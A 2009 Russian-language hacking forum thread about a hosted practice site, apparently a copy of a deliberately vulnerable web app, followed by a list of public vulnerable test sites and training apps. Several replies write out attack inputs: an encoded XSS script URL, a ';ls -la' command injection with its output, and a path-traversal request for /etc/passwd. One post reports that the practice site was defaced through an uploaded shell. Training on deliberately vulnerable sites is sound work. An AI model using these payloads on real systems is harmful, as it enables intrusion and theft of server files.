Площадка для тренировки по взлому

Discussion in 'Уязвимости' started by <Cyber-punk>, 23 Dec 2009.

  1. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    Площадка для тренировки по взлому.
    Имеется 3 уровня сложности.
    Что не работает пишем суда.

    -------------------------------------------
    Взламывай на здоровье ! (В.Н.З.)
    --------------------------------------------
     
    _________________________
  2. Belov

    Belov Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    35
    Likes Received:
    5
    Reputations:
    0
    Code:
    http://tortop.msk.ru/xss.php?name=%3c%53%43%52%49%50%54%3e%61%6c%65%72%74%28%2f%42%65%6c%6f%76%2f%2e%73%6f%75%72%63%65%29%3c%2f%53%43%52%49%50%54%3e
     
  3. lukmus

    lukmus Elder - Старейшина

    Joined:
    18 Nov 2009
    Messages:
    384
    Likes Received:
    115
    Reputations:
    23
    признаю свою ошибку, не видел выбор уровня
     
    #3 lukmus, 23 Dec 2009
    Last edited: 23 Dec 2009
  4. lukmus

    lukmus Elder - Старейшина

    Joined:
    18 Nov 2009
    Messages:
    384
    Likes Received:
    115
    Reputations:
    23
    ;ls -la
    total 716
    drwx------ 8 whatthis customers 4096 Dec 23 20:07 .
    drwx------ 3 whatthis customers 4096 Sep 14 13:49 ..
    -rw------- 1 whatthis customers 143 Dec 23 20:07 .htaccess
    -rw------- 1 whatthis customers 2517 Dec 23 20:07 CHANGELOG.txt
    -rw------- 1 whatthis customers 32485 Dec 23 20:07 COPYING.txt
    -rw------- 1 whatthis customers 553472 Nov 13 14:38 MyProxy.exe
    -rw------- 1 whatthis customers 3194 Dec 23 20:07 README.txt
    -rw------- 1 whatthis customers 1538 Dec 23 20:07 SQLi.php
    -rw------- 1 whatthis customers 383 Dec 23 20:07 about.php
    drwx------ 2 whatthis customers 4096 Nov 28 22:51 admin
    drwx------ 3 whatthis customers 4096 Dec 23 20:23 board
    -rw------- 1 whatthis customers 1391 Dec 23 20:07 brute.php
    drwx------ 2 whatthis customers 4096 Sep 14 13:49 cgi-bin
    -rw------- 1 whatthis customers 152 Dec 23 20:07 config.php
    -rw------- 1 whatthis customers 1274 Dec 23 20:07 csrf.php
    -rw------- 1 whatthis customers 1112 Dec 23 20:07 exec.php
    -rw------- 1 whatthis customers 358 Dec 23 20:07 fi.php
    -rw------- 1 whatthis customers 711 Dec 23 20:07 fi_content.php
    drwx------ 5 whatthis customers 4096 Dec 23 20:07 includes
    -rw------- 1 whatthis customers 911 Dec 23 20:11 index.php
    -rw------- 1 whatthis customers 1434 Dec 23 20:07 main.css
    -rw------- 1 whatthis customers 20594 Nov 13 14:39 myproxy.zip
    -rw------- 1 whatthis customers 148 Dec 23 20:07 php.ini
    -rw------- 1 whatthis customers 19 Dec 23 20:07 phpinfo.php
    drw-rw-rw- 6 whatthis customers 4096 Oct 14 19:59 quest
    -rw------- 1 whatthis customers 25 Dec 23 20:07 robots.txt
    -rw------- 1 whatthis customers 831 Dec 23 20:07 security.php
    -rw------- 1 whatthis customers 2024 Dec 23 20:07 setup.php
    -rw------- 1 whatthis customers 757 Dec 23 20:07 upload.php
    drwx------ 2 whatthis customers 4096 Dec 23 21:00 uploads
    -rw------- 1 whatthis customers 1775 Dec 23 20:07 xss.php
     
  5. Belov

    Belov Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    35
    Likes Received:
    5
    Reputations:
    0
    http://tortop.msk.ru/dvwa/includes/source/fi_source.php

    Ошибка. Ссылка не работает.
     
  6. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Ну если я ограничился просто добавлением die(); то другие могли снести сайт под корень, совсем не продумал ты ничего, фактически оставил шелл на сайте, а ведь у тебя там есть и другие проекты (к примеру naume.ru) к которым можно перелезть, залив шелл на сайт для тренинга.

    P.S. а ну вот видишь теперь кто то уже написал "Haked by Webkill".
    P.P.S. могу бы хотя бы права на запись убрать для начала.
    Ну а вообще смысла в идеи не вижу.
     
    #6 Grey, 23 Dec 2009
    Last edited: 23 Dec 2009
  7. Belov

    Belov Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    35
    Likes Received:
    5
    Reputations:
    0
    эх я отошел не дали мне время )
     
  8. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    БАЛИН сайт для тренировки а не для того чтобы всё изговнеть Понял webkill !!!!
     
    _________________________
  9. Belov

    Belov Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    35
    Likes Received:
    5
    Reputations:
    0
    http://tortop.msk.ru/fi.php?page=../../../../../../../../etc/passwd%00
     
  10. c0n Difesa

    c0n Difesa Member

    Joined:
    1 Jan 2009
    Messages:
    133
    Likes Received:
    66
    Reputations:
    18
    Online-ресурсы для проведения аудита (читай: площадки для тренировки по взлому):

    1) тестовые сайты от Acunetix:

    - http://testphp.acunetix.com/ (PHP);
    - http://testasp.acunetix.com/ (ASP);
    - http://testaspnet.acunetix.com/ (ASP.NET);

    2) тестовый сайт от HP: http://zero.webappsecurity.com/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com

    3) тестовый сайт от IBM: http://demo.testfire.net/

    Сборки уязвимых web-приложений (для самостоятельной установки):

    1) Stanford SecuriBench: http://suif.stanford.edu/~livshits/securibench/
    2) OWASP WebGoat: http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

    3) Mutillidae: http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10


    Проекты аналогичной тематики рассчитаны на аудиторию, от которой можно ожидать всего что угодно, поэтому и проектируются они stand-alone от рабочих проектов.
     
  11. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Мда... А толку от этого? Скачал эту площадку - http://forum.antichat.ru/thread130070.html, залил себе на сайт... Хоть бы копирайты в теме поставил.

    PS: Когда я тренировался на ней, видел, там было написано "Ни в коем случае не загружайте эту площадку на свои сайты" (точно не помню, по английски было написано...)
     
    1 person likes this.
  12. c0n Difesa

    c0n Difesa Member

    Joined:
    1 Jan 2009
    Messages:
    133
    Likes Received:
    66
    Reputations:
    18
    Ресурсы перечислил для тех, кто заинтересовался данным топиком. Сайт ТС полезен, но спроектирован неудачно, что повлекло за собой его неработоспособность (надеюсь, временную).

    Перечисленные мною сайты, возможно, могут послужить альтернативой для интересующейся аудитории.

    Все сайты брал исключительно из своей коллекции, значительную часть из которой нашел в блоге, адрес которого уже не помню.
     
Loading...